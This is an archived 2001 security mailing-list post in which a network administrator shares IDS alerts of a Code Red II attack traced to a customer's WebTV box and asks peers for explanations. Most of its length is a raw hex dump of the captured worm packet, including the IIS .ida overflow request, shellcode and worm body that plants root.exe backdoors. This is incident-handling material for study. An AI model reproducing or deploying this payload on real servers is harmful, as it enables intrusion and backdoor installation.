Code Red - Kind of interesting actually

From: Keith Pachulski (Keith.Pachulskiat_private)
Date: Mon Aug 27 2001 - 13:15:29 PDT
Next message: terry white: "CBOS v2.4.3"
Previous message: Reeves, Michael (GEAE, Compaq): "RE: Identification needed ..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

While the following dumps seem all too familiar by now, keep reading
as the source of these are an unlikely source.

[**] IDS552 web-iis_IIS ISAPI Overflow ida [**]
08/10-13:39:51.066030 204.x.x.x:1735 -> 204.x.x.x:80
TCP TTL:125 TOS:0x0 ID:12845 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8246A40B  Ack: 0x49256627  Win: 0x2238  TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00  79 ........`....
00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00  ....dg.6..dg.&..
E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF  .....h......\...
50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40  P.U...\...P.U..@
10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00  .....X....U.=...
00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6  ....=...........
C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00  ...T....u..~0...
00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A  ........F0......
00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24  ...CodeRedII...$
FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50  .U.f.....8.....P
FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50  .......j...P...P
8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84  ..8...P.E..p....
00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4  .....8....thS.U.
FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00  .U..E.i.T...,...
81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7  ..,.............
89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00  .F4.E.Pj..u.....
00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55  ......j.j..U.P.U
D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00  .Ou..;...i.T....
5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A  \&....\&.W.U.j.j
16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45  ..U.j..U....F4)E
84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0  .jd.U...<...P.U.
0F B7 85 3C FE FF FF 3D D2 07 00 00 73 CF 0F B7  ...<...=....s...
85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF  .>......s.f..p..
FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00  ...f..r....P.d..
00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8  ...t...j.j.j..U.
83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80  ...t..E.j.Th~f..
FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50  .u..U.Yj...p...P
FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33  .u..U........tK3
DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF  ..U.=3'..u?..h..
FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7  .......l........
85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF  .`........E...d.
FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF  ....h...Pj...`..
FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66  .Pj.j..U..j.Th~f
04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00  ...u..U.Y...u1..
00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00  ...X-....j.h....
50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00  P.u..U.=....u.j.
6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF  j...\...P.u..U..
75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81  u..U..........w.
C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00  ..........xu....
F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06  ..`......d$.dg..
00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26  ..Xa..dg.6..dg.&
00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50  ..f.;MZu..K<.<.P
45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C  E..u..T.x...B..<
03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75  .KERNu..|..EL32u
BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47  .3.I.r ...A..<.G
65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03  etPu..|..rocAu..
4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03  J.I...J$........
4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00  J.......D$$dg...
00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8  .Xa..Q....]..E..
0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41  ....LoadLibraryA
00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43  ..u..U..E......C
72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF  reateThread..u..
55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63  U..E......GetTic
6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC  kCount..u..U..E.
E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55  .....Sleep..u..U
F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74  ..E......GetSyst
65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00  emDefaultLangID.
FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65  .u..U..E......Ge
74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79  tSystemDirectory
41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00  A..u..U..E......
43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8  CopyFileA..u..U.
89 45 DC E8 10 00 00 00 47 6C 6F 62 61 6C 46 69  .E......GlobalFi
6E 64 41 74 6F 6D 41 00 FF 75 FC FF 55 F8 89 45  ndAtomA..u..U..E
D8 E8 0F 00 00 00 47 6C 6F 62 61 6C 41 64 64 41  ......GlobalAddA
74 6F 6D 41                                      tomA
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+=+
[**] IIS CodeRed v2 overflow root.exe [**]
08/10-13:39:51.343109 204.x.x.x:1735 -> 204.x.x.x:80
TCP TTL:125 TOS:0x0 ID:12846 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x8246A9BF  Ack: 0x49256627  Win: 0x2238  TcpLen: 20
00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@......h.$@.h
3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.....h.$@.h.
20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217.... 
40 00 89 35                                      @..5
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+=+

once the requests triggered the IDS, they were traced back to a user
on our network. The user is a customer of webtv. Checking on the
HiPerARC verified this via the login information. 

100a63010@webtvf-ip-I3055       IP   slot:8/mod:7    ENA   DYN 
204.x.x.x/H

While working too a very small degree with Microsoft they dropped the
issue..so I for one am left with a puzzle on my hands. While the
person is using our network equipment to access the net, the are not
really a customer of ours. I reffered this information to Microsoft
who would not look into it nor question the customer. I took it upon
myself to contact the customer. The only real information they were
able to offer me was that their WebTV box was acting with on the day
of the detect I had and a few days later..after rebooting the box the
customer had no further problems. This is a WebTV device, not WebTV
for Windows.

Anyone ever see anything similar to this, or have some decent
explanation besides spoofing or tcp hijacking as Microsoft already
gave us those and we have since disregarded those due to our network
setup.

- -Keith

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBO4qrpuGTq6qVSXTQEQL//wCgolNxyde+hBW9KBedD/W6FHdOb2wAoLAU
pXmAtCmmBLMgLVzWQM9RaePp
=PTuG
-----END PGP SIGNATURE-----
text/plain attachment: alert.txt
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Next message: terry white: "CBOS v2.4.3"
Previous message: Reeves, Michael (GEAE, Compaq): "RE: Identification needed ..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Mon Aug 27 2001 - 13:59:21 PDT